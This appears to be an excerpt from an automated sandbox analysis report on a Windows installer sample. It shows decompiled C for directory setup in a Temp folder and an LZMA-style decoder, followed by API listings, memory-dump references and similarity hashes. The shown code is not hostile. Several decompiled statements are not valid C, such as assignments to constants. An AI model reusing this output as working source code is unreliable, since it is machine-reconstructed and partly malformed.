						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405892(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405815(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406228("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                0x004015bb
                                                0x004015c2
                                                0x004015c5
                                                0x004015ca
                                                0x004015ce
                                                0x004015d0
                                                0x004015d8
                                                0x004015da
                                                0x004015dc
                                                0x004015e0
                                                0x004015e3
                                                0x004015fb
                                                0x004015fc
                                                0x004015e5
                                                0x004015e5
                                                0x004015e8
                                                0x00000000
                                                0x004015f3
                                                0x004015f4
                                                0x004015f4
                                                0x004015e8
                                                0x00401603
                                                0x0040160a
                                                0x00401617
                                                0x00401617
                                                0x0040160c
                                                0x0040160d
                                                0x00401615
                                                0x00000000
                                                0x00000000
                                                0x00401615
                                                0x0040160a
                                                0x0040161a
                                                0x0040161d
                                                0x0040161f
                                                0x00401620
                                                0x004015d0
                                                0x00401627
                                                0x00401652
                                                0x004022dd
                                                0x00401629
                                                0x0040162b
                                                0x00401636
                                                0x0040163c
                                                0x00401644
                                                0x0040164a
                                                0x0040164a
                                                0x00401644
                                                0x00402a5d
                                                0x00402a69

                                                APIs
                                                  • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,747DFA90,?,747DF560,00405A10,?,747DFA90,747DF560,00000000), ref: 00405C67
                                                  • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                  • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                  • Part of subcall function 00405815: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 1892508949-1104044542
                                                • Opcode ID: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                                • Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
                                                • Opcode Fuzzy Hash: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                                • Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 99%
                                                			E00406D5A() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
